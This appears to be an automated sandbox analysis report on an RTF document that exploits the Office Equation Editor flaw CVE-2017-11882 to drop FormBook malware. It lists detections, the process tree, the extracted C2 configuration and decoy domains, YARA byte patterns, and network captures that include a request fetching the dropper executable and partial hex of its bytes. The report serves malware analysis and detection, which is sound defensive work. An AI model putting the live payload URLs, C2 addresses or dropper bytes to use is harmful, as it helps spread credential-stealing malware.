Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3nkW4MtwSD

Overview

General Information

Sample Name:3nkW4MtwSD (renamed file extension from none to rtf)
Analysis ID:528701
MD5:5aad2b6635b3069402aaf6ff389bea64
SHA1:a8617ddffd6c934fcf3f64c6e84b1a23ffa9d092
SHA256:718dcc870c0de487595feed4e5e43dc70fba6fa2aaac15462c0ba5c20028e7bd
Tags:rtf
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2592 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1592 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2652 cmdline: "C:\Users\Public\vbc.exe" MD5: 075BD1E3E3E0C01794EE6A84BE2C585A)
      • vbc.exe (PID: 2412 cmdline: C:\Users\Public\vbc.exe MD5: 075BD1E3E3E0C01794EE6A84BE2C585A)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • raserver.exe (PID: 1892 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
          • cmd.exe (PID: 772 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Click to see the 31 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.0.vbc.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.0.vbc.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.0.vbc.exe.400000.9.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          4.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            4.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 16 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.199.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1592, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1592, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2652
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1592, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2652

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 3nkW4MtwSD.rtfVirustotal: Detection: 56%Perma Link
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: 3nkW4MtwSD.rtfAvira: detected
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: 4.0.vbc.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.0.vbc.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.0.vbc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
            Source: Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: global trafficDNS query: name: www.mountfrenchlodge.net
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.46.199.153:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.46.199.153:80

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.cuteprofessionalscrubs.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.mountfrenchlodge.net
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.cuteprofessionalscrubs.com/9gr5/
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: global trafficHTTP traffic detected: GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.mountfrenchlodge.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.cuteprofessionalscrubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 198.46.199.153 198.46.199.153
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 16:23:57 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 25 Nov 2021 02:23:58 GMTETag: "b4a00-5d193aabff887"Accept-Ranges: bytesContent-Length: 739840Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be f3 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3e 0b 00 00 0a 00 00 00 00 00 00 be 5b 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 5b 0b 00 4f 00 00 00 00 60 0b 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 3c 0b 00 00 20 00 00 00 3e 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 06 00 00 00 60 0b 00 00 08 00 00 00 40 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 48 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 5b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 d0 21 01 00 03 00 00 00 8c 01 00 06 7c 6a 02 00 f0 f0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1
            Source: global trafficHTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.199.153Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:25:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:25:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.199.153
